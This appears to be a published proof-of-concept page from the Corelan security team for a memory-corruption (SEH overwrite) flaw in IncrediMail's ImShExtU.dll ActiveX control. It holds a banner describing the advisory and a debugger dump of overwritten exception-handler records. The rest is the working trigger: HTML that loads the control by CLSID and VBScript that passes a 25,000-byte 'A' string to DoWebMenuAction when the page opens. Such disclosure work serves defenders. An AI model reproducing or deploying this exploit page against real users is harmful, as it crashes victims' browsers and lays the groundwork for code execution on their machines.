<html>
<!--|------------------------------------------------------------------|| __ __|| _________________/ /___ _____ //________ _____ ___||/ ___/ __ \/ ___/ _ \// __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ ||//__/ /_/ ///__/ //_/ //////_/__/ /_/ //////|| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/|||| http://www.corelan.be:8800 ||security@corelan.be ||||-------------------------------------------------[ EIP Hunters ]--|# Software: Incredimail (ImShExtU.dll)# Reference : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-038# Author: Lincoln# OS: Windows# Tested on : XP SP3 En (VirtualBox)# Type of vuln: SEH# Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/## Script provided 'as is', without any warranty.# Use for educational purposes only.# Do not use this code to do anything illegal !## Note : you are not allowed to edit/modify this code.# If you do, Corelan cannot be held responsible for any damages this may cause.##0013F1A4 41414141AAAA#0013F1A8 41414141AAAA#0013F1AC 41414141AAAAPointer to next SEH record#0013F1B0 41414141AAAASE handler#0013F1B4 41414141AAAA#0013F1B8 41414141AAAA#-->
<object classid='clsid:F8984111-38B6-11D5-8725-0050DA2761C4' id='target' ></object>
<script language='vbscript'>
crash=String(25000,"A")
target.DoWebMenuAction crash
</script>
<b><center>IncrediMail ImShExtU.dll ActiveX Memory Corruption</b></center>
</html>
